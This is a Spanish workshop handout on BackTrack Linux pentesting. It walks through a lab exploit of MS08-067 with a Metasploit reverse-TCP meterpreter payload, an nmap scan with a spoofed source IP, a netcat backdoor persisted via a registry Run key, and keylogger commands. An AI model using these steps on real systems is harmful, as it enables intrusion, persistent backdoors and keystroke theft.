Está en la página 1de 12

Taller Backtrack Linux

[*] Presentacion

[*] Disclaimer

[*] Que es Backtrack?

[*] Tools

[*] Habilitacion de Servicios

[*] Taller

– Footprinting

– Scanning

– Exploiting vulnerabilities

– Habilitar Escritorio remoto

– BackDoor

– Keylogger

[*] Links de Interes


[*] Disclaimer

Taller de backtrack se hace solo con fines exclusivamente educativos, para


motivar el movimiento del software libre, Tambien mostrar que tan vulnerables
son los S.O y sus servicios. Los desarrolladores de este taller no se hacen
responsables del futuro uso de conocimientos y habilidades adquiridas en el
taller.

[*] Que es Backtrack

Es una distribucion Gnu/Linux basada en ubuntu (la version 4), las versiones 1 2
3 estan basadas en slax, esta distro esta Enfocada hacia el area de seguridad
informatica y pentest. Esta gran plataforma fue desarrollada por los muchach@s
de remote-exploit.

[*] Tools

Informatio Gathering

Networking mapping

Vulnerability Identification

Web application Analysis

Radio network analysis

penetration

Privilege Escalation
Maintaining Access

Digital Forensics

Reverse Engieneering

Voive Over IP

Misecellaneous

[*] Habilitacion de servicios

Habilitando Tarjetas de red

• ifup eth0
• ifconfig eth0 – dhclient eth0
• ifconfig wlan0 – wicd – GUI wicd manager

Habilitando servidor apache

• /etc/init.d/apache2 start | stop

Habilitando Servidor SSH

• /etc/init.d/ssh start | stop


• sshd generate

[*] Taller

Host A ------> Victima


Host B ------> Atacante

-Footprinting

Este paso es donde llevaremos acabo el reconocimiento del host A.


1# Netcat

Colocaremos el netcat a la escucha de nuestro puerto 80 y con un poco de


ingienieria social haremos que el host A se conecte al host B por medio
cualquier Navegador.

HOST B
root@bt:# nc -vlp 80

HOST A

HOST B
2# Lanmap

Lanmap como el mismo nombre lo dice LAN – MAP lo que hace es graficar la red LAN
donde estamos ubicados, de acuerdo a solucitudes que hace los dispositivos tanto
intermedios (routers, switchs, etc) como finales (computadores, impresoras,
telefonos IP, etc) daran una respuesta y al dar su respuesta el lanmap la
recibira y graficara la LAN. De alli tambien podremos verificar que tipo de S.O
tienen los demas hosts en la LAN.

HOST B

root@bt:# lanmap -v -i wlan | eth0 -r 30 -T png -o /root/

en la sintaxis definimos la interface por donde estamos conectados damos un


tiempo de respuesta, el formato de salida de la imagen .PNG y el directorio
donde sera guardado.
Aquí podremos ver el host A :), con esto nos podremos ubicar como esta
estructurada la LAN donde estamos, despues que veamos que la imagen esta
practicamente totalmente hecha prodemos ver nuestra shell donde ejecutamos el
lanmap y alli podremos ver mas caracateristicas (ttl de cada host, direccion MAC
, etc).

-Scanning
Este paso es donde veremos que puertos tiene habilitados y con que servicio se
esta ejecutando, tambiem podremos partir de a las respuesta que nos de nuestro
host A para ver que S.O esta corriendo en el.

1#nmap

nmap es una herramienta que nos permite escanear puertos, hacer detencion del
sistema operativo, entre otras muchas utilidades.lo que haremos ahorita sera
hacer un escaneo activo para verificar que puertos tiene habilitados, que
servicio se esta ejecutando, hacer dentecion del sistema operativo y hacer ip
spoofing.

nmap -e eth0 -PN -S <Host_ipspoof> -sV -O <hostA>

en la sintaxix definimos la interface de red que sera eth0 / wlan0 luego


activamos la funcion de ping y luego la funcion de spoofing (osea que cuando van
a ver la trama de datos y van a ver en el encabezado la ip de provenencia va a
aparecer la ip que nostros definamos alli) activamos estas 3 funciones para que
cuando cuando se active el escaneo funcione completamente, luego definimos un
escaneo de puertos y servicios, por ultimo la detencion del sistema operativo y
definimos el host.
Como vemos nos funciono perfectamente, nos muestra que puertos estan habilitados
y que S.O esta ejecutandose, para probar que la funcion de spoof esta bien
analizaremos la red con el wireshark.

Como vemos aparece en la trama de red cuando lanzamos el escaneo la ip que


definimos 25.25.25.25

-Exploiting vulnerabilities

Este metodo que llevaremos acabo lo haremos partiendo de la informacion que


hemos obtenido hasta ahora. Bueno como vemos en los puertos habilitados tenemos
2 que son sumamente vulnerables.

Aquí utilizaremos un herramienta llamada metasploit (metasploit es una


plataforma donde encotraremos exploits, encoder, auxiliarys y demas herramientas
que vienen con si), el termino exploit es un programa que explota las
vulnerabilidades de X sistema dentro de dicho exploit se encuentra la shellcode
(la shellcode son lineas de ASM que permite activar shells remotas del sistema y
mas propiedades)
Introduccion a metasploit

Tipo de interfaces

Shell

GUI
WEB

Comandos y terminos basicos

payload ----> Tipo de accion la cual se va a realizar si es explotada la


vulnerabilidada

exploits ----> Programa para explotar la vulnerabilidad

encoders ----> Algoritmos de ayuda

auxiliary ---> Modulos o tools de msf

set -----> Definir valor

use -----> Definir exploit

run -----> modo de ejecutar los auxiliarys

exploit ---> modo de ejecutar los

sessions ---> mostrar / iniciar sessiones obtenidas con el metasploit


-Explotanto Vulnerabilidad port 445

selecionando Exploit ----> use windows/smb/ms08_067_netapi


selecionando payload ----> set payload windows/meterpreter/reverse_tcp
selecionando Host Victima –> set RHOST <IP_Victima>
selecionando Host Atacante -> set LHOST <IP_Atacker>
Ejecutando el Exploit -> exploit

Resultado

Como hemos visto hemos logrado acceder al sistema windows, obtenemos una session
de meterpreter (el interprete de windows) y luego ejecutamos un codigo del
sistema.

- Habilitar Escritorio remoto

sintaxis
run vnc

lo que se hace aquí es enviarle un es enviarle un server con la propiedad de


Escritorio remoto y lo que se hara entablar la conexión y empezar a funcinar
como tal el escritorio remoto.
-BackDoor
Que es un BackDoor?
*netcat
Instalacion de un backdoor

1 subimos de nuestro Host al Host Victima el netcat


upload /root/nc.exe C:\\Windows\\System32\\

2 agregamos al registro el nectat en modo escucha

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Lab


Backtrack -d 'C:\Windows\System32\nc.exe -L -d -p 666 -e cmd.exe'

3 Reiniciamos el host

reboot

4 metodos de conexión

[*]msf
[*]netcat

Conclucion
asi cada vez que necesitimos volver a conectarnos al host no tenemos que volver
a explotar la vulnerabilidad, solo es cuestion de conectarse.
-Keylogger

Que es un Keylogger

Ejecucion

keyscan_start

keyscan_dump

keyscan_stop

– Links de interes
[*] http://www.backtrack-linux.org/
[*] http://taxoback.eshost.com.ar/
[*] http://www.assasins.com.ar/
[*] http://comunidad.dragonjar.org/
[*] http://www.antrax-labs.tk/

Taller eleborado por:


Kevin David Quiroga Astroz - [Progresive Death]
Aprendiz sena
Lider - Comunidad de Desarrollo Informatico [CDIN]

Contacto:
kdquiroga@misena.edu.co

También podría gustarte